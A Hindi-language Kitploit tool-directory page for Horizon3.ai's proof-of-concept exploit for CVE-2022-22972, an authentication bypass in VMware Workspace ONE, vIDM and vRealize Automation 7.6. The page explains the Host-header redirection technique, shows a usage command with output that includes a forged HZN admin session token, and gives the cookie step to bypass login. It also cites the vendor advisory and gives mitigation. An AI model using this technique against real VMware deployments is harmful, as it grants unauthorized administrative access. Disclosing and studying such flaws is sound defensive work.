Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22972 — CVE-2022-22972 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो VMware Workspace ONE, vIDM, और vRealize Automation 7.6 में Host हेडर हेरफेर के माध्यम से प्रमाणीकरण को बायपास करता है। | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2022-22972
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubhorizon3ai/cve-2022-22972

CVE-2022-22972

CVE-2022-22972 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो VMware Workspace ONE, vIDM, और vRealize Automation 7.6 में Host हेडर हेरफेर के माध्यम से प्रमाणीकरण को बायपास करता है।

रिपॉजिटरी देखें
1502714 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22972

VMware Workspace ONE, vIDM, और vRealize Automation 7.6 को प्रभावित करने वाले CVE-2022-22972 के लिए POC।

तकनीकी विश्लेषण

इस भेद्यता का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive

सारांश

यह स्क्रिप्ट CVE-2022-22972 का उपयोग करके vRealize Automation 7.6 पर प्रमाणीकरण बायपास करने के लिए इस्तेमाल की जा सकती है। Workspace ONE और vIDM के प्रमाणीकरण एंडपॉइंट अलग-अलग हैं, लेकिन इस भेद्यता का मूल वही रहता है। यदि आपके पास प्रवाह को सत्यापित करने के लिए परीक्षण लेख हैं, तो हम पुल रिक्वेस्ट स्वीकार करने में प्रसन्न होंगे।

यह स्क्रिप्ट VMware प्रमाणीकरण एंडपॉइंट के HTTP POST अनुरोध के Host हेडर को हमलावर द्वारा नियंत्रित Host में बदलकर काम करती है। इससे VMware एप्लिकेशन क्रेडेंशियल जानकारी के साथ उस Host से संपर्क करता है, और यदि Host 200 लौटाता है, तो उपयोगकर्ता सफलतापूर्वक प्रमाणित हो जाता है।

यह स्क्रिप्ट HZN कुकी उत्पन्न करती है, जिसे बाद के अनुरोधों में शामिल करके समझौता किए गए उपयोगकर्ता के रूप में कार्य किया जा सकता है।

नोट: स्क्रिप्ट के डिफ़ॉल्ट args प्रमाणीकरण अनुरोध को हमारे AWS API गेटवे पर भेजेंगे, जो ब्लॉग में उल्लिखित विशिष्ट एंडपॉइंट के लिए 200 का उत्तर देने के लिए कॉन्फ़िगर किया गया है। आप इसे --host विकल्प से बदल सकते हैं। यह एंडपॉइंट एक्सप्लॉइट प्रवाह के दौरान कोई संवेदनशील डेटा प्राप्त नहीं करेगा - केवल कमजोर एप्लिकेशन से नकली auth हेडर के साथ एक अनुरोध, जिसका वह उत्तर देता है।

उपयोग

root@kitploit:~
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint

HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8

प्रमाणीकरण बायपास करने के लिए अपने ब्राउज़र में HZN कुकी सेट करें।

शमन उपाय

नवीनतम संस्करण में अपडेट करें या VMSA में दिए गए निर्देशों का पालन करके शमन करें।

  • https://www.vmware.com/security/advisories/VMSA-2022-0014.html

नवीनतम सुरक्षा शोध के लिए Twitter पर Horizon3.ai Attack Team को फॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ़्टवेयर विशुद्ध रूप से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और यह स्पष्ट रूप से अधिकृत किए जाने को छोड़कर सिस्टम पर हमला करने के लिए उपयोग किए जाने के इरादे से नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। ज़िम्मेदारी से उपयोग करें।

टूल डाउनलोड करें